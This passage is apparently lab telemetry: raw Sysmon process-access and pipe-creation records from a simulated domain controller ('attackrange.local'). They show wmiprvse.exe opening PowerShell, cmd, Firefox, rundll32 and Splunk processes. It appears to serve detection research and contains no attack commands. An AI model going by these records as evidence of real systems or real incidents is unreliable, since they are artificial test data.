ystem32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002242590Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:42.951{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-649E-603D-AC86-00000000AD01}7952C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002242589Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:42.951{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-649E-603D-AB86-00000000AD01}5896C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002242588Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:42.951{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-4090-603D-F281-00000000AD01}2992C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002242587Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:42.951{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-4090-603D-F181-00000000AD01}1592C:\Windows\system32\cmd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002242586Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:42.951{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-FB2E-603C-9079-00000000AD01}4328C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002242585Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:42.951{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-FB27-603C-8779-00000000AD01}2272C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002242584Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:42.951{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-FB20-603C-5D79-00000000AD01}1652C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002242583Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:42.951{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-FB1F-603C-5979-00000000AD01}6484C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002242582Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:42.951{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-7A5F-6039-4410-00000000AD01}2140C:\Windows\System32\rundll32.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002242581Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:42.951{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-7949-6039-1B10-00000000AD01}5344C:\Program Files\Mozilla Firefox\firefox.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002242580Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:42.951{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-7948-6039-1A10-00000000AD01}4808C:\Program Files\Mozilla Firefox\firefox.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002242579Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:42.951{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-7947-6039-1910-00000000AD01}5136C:\Program Files\Mozilla Firefox\firefox.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002242578Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:42.951{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-7947-6039-1810-00000000AD01}4892C:\Program Files\Mozilla Firefox\firefox.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002242577Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:42.951{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-7946-6039-1610-00000000AD01}3144C:\Program Files\Mozilla Firefox\firefox.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002242576Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:42.951{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-76AE-6039-B70F-00000000AD01}5892C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002242575Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:42.951{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-76AE-6039-B60F-00000000AD01}5836C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002242574Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:42.951{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-74FB-6039-800F-00000000AD01}6628C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002242573Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:42.951{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-74C8-6039-780F-00000000AD01}6760C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 17141700x80000000000000002242572Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-CreatePipe2021-03-02 16:54:42.951{05ADC7E1-6DD2-603E-D2AA-00000000AD01}13920\PSHost.132591776828040541.13920.DefaultAppDomain.powershellC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 10341000x80000000000000002242571Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:42.951{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-74C8-6039-770F-00000000AD01}7048C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002242570Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 